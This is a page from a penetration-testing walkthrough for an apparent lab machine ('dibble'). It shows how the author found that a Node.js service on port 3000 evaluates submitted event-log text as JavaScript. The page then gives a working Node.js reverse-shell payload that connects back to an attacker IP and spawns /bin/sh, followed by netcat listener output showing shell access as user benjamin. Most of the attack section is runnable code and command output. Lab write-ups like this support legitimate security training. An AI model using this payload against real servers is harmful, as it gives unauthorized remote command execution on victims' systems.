7 :3000 nodejs exploit

# as we know :3000 is running nodejs
# adding a post 1+1 and checking if its evaluated
User: 	k1 	Event log: 	2

# try a js function code
(function(){
   return 2+2;
})();
User: 	k2 	Event log: 	4

# the event log is being evaluated.
# nodejs shell
Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(3000, "192.168.49.213", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

$ nc -lvnp 3000
listening on [any] 3000 ...
connect to [192.168.49.213] from (UNKNOWN) [192.168.213.110] 48194
whoami;id;hostname;uname -a
benjamin
uid=1000(benjamin) gid=1000(benjamin) groups=1000(benjamin)
dibble
Linux dibble 5.8.10-200.fc32.x86_64 #1 SMP Thu Sep 17 16:48:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Previous8 box enum benjamin > privesc > rootNext6 :27017 mongodb

Last updated